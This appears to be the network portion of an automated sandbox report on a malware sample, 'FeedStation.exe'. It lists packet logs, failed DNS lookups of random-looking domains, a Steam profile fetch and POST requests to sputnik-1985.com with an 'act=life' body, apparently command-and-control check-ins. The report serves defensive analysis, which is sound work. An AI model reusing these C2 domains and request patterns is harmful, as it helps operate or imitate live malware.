                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.757775068 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.757925987 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.759665012 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.759670019 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.759979010 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.761451960 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.761650085 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.761686087 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.761745930 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.803324938 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.267585039 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.267669916 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.267744064 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.322556019 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.322578907 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.867378950 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.867424965 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.867536068 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.868002892 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:19.868024111 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.346498966 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.346697092 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.348054886 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.348067045 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.348340988 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.349589109 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.349733114 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.349766016 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.349973917 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.349988937 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.940834045 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.940926075 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.941134930 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.941165924 CET49819443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:20.941180944 CET44349819104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.256979942 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.257028103 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.257131100 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.257525921 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.257538080 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.715971947 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.716762066 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.717382908 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.717389107 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.717618942 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.719000101 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.719000101 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:21.719023943 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.493932009 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.494029999 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.494087934 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.495929956 CET49829443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.495945930 CET44349829104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.762533903 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.762578011 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.762645006 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.763283968 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:22.763298988 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.238323927 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.238400936 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.239970922 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.239980936 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.240230083 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.242271900 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.242378950 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.242384911 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.775135994 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.775243998 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.775419950 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.775556087 CET49840443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.775571108 CET44349840104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.804420948 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.804454088 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.804557085 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.804908991 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:23.804922104 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.286714077 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.286957979 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.293687105 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.293709993 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.293955088 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.295218945 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.295283079 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.295321941 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807015896 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807115078 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807178974 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807482004 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807502985 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807521105 CET49847443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:24.807526112 CET44349847104.21.112.1192.168.2.5
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.442100048 CET5654853192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.452691078 CET53565481.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.456228971 CET5789953192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.465557098 CET53578991.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.469485044 CET6259053192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.479367018 CET53625901.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.481735945 CET5363053192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.495337009 CET53536301.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.500881910 CET5021453192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.510917902 CET53502141.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.513175011 CET6128753192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.531842947 CET53612871.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.537250042 CET5281453192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.546886921 CET53528141.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.548954010 CET5891553192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.578705072 CET53589151.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.581218958 CET5228153192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.591371059 CET53522811.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.594044924 CET5299753192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.603363037 CET53529971.1.1.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.900018930 CET5889353192.168.2.51.1.1.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET53588931.1.1.1192.168.2.5
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.442100048 CET192.168.2.51.1.1.10x7c2Standard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.456228971 CET192.168.2.51.1.1.10xc5f7Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.469485044 CET192.168.2.51.1.1.10x94c5Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.481735945 CET192.168.2.51.1.1.10xfeb5Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.500881910 CET192.168.2.51.1.1.10x2176Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.513175011 CET192.168.2.51.1.1.10xebf3Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.537250042 CET192.168.2.51.1.1.10x19d6Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.548954010 CET192.168.2.51.1.1.10xac92Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.581218958 CET192.168.2.51.1.1.10xc43aStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.594044924 CET192.168.2.51.1.1.10x316dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.900018930 CET192.168.2.51.1.1.10x5376Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.452691078 CET1.1.1.1192.168.2.50x7c2Name error (3)ingreem-eilish.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.465557098 CET1.1.1.1192.168.2.50xc5f7Name error (3)immureprech.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.479367018 CET1.1.1.1192.168.2.50x94c5Name error (3)deafeninggeh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.495337009 CET1.1.1.1192.168.2.50xfeb5Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.510917902 CET1.1.1.1192.168.2.50x2176Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.531842947 CET1.1.1.1192.168.2.50xebf3Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.546886921 CET1.1.1.1192.168.2.50x19d6Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.578705072 CET1.1.1.1192.168.2.50xac92Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.591371059 CET1.1.1.1192.168.2.50xc43aName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.603363037 CET1.1.1.1192.168.2.50x316dNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.907584906 CET1.1.1.1192.168.2.50x5376No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • sputnik-1985.com
                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.549773104.102.49.2544436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:14 GMT
                                                                                                                                                                                                                          Content-Length: 35126
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=5c7a4220af3eb1b5130a8937; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                          Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                          2025-01-10 10:59:14 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                          Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.549783104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:15 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                          2025-01-10 10:59:15 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:15 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=0n7m1qqchj73tia5kqrmeoob9k; expires=Tue, 06 May 2025 04:45:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pdW6BbPTuh5T90unk6pr2r0UyquLyoAKHWPJaogN3AvkD4aMcPmThBKQ2ipzBHTPcPp5lP8VlkJzImF0DLULF59EFpPmamla59viYsrmGm51Svur%2BfKbBoPK788%2FB11wEzd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc28159a27424b-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1551&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1853968&cwnd=248&unsent_bytes=0&cid=9309341b258720f9&ts=447&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                          2025-01-10 10:59:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.549791104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 86
                                                                                                                                                                                                                          Host: sputnik-1985.com
